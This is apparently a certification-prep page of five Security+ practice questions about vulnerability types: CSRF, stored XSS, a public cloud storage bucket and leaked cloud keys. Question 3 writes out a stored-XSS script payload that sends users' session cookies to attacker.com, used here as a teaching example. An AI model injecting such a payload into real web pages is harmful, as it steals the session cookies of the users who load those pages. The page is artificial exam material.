CompTIA Security+ · SY0-701

Objective 2.3: Explain various types of vulnerabilities

Practice questions for Security+ objective 2.3, Explain various types of vulnerabilities.” Every question is original, written to the SY0-701 exam objectives, and comes with a full explanation — answer them below to see instant grading.

This objective sits in Domain 2.0: Threats, Vulnerabilities, and Mitigations, which is about 22% of the exam — so mastering it moves your readiness score meaningfully.

1.An attacker sends a specially crafted HTTP request that tricks a user's browser into submitting an authenticated request to a banking application without the user's knowledge. Which vulnerability type is this?

2.A developer reviews a bug report for an internal web application. The report describes an issue where users can enter text into a comment field that is stored in the database and then rendered directly in other users' browsers without sanitization. When a researcher entered a specific string into the comment field, a dialog box appeared in every browser that loaded the page containing that comment. Which vulnerability type does this describe, and what is the primary security risk beyond the demonstrated proof-of-concept?

3.A penetration tester submits the following input into a web application's search field: <script>document.location='https://attacker.com/steal?c='+document.cookie</script> The input is saved to a database and every user who subsequently loads the search results page has their session cookie silently sent to the attacker's server. Which vulnerability type does this represent, and why is it more severe than the reflected variant?

4.A cloud administrator accidentally makes an S3 storage bucket containing sensitive customer data publicly accessible. Which vulnerability category does this represent?

5.A developer inadvertently commits AWS access keys to a public GitHub repository. An automated bot discovers the keys within minutes and begins spinning up cryptocurrency mining instances. Which vulnerability category allowed this breach?

Practice every objective, adaptively

CertBench tracks your score on 2.3 and every other objective, then builds a daily plan that targets your weakest spots. Start with the free diagnostic.

Take the free diagnostic

More objectives in Domain 2.0

← All Security+ practice questions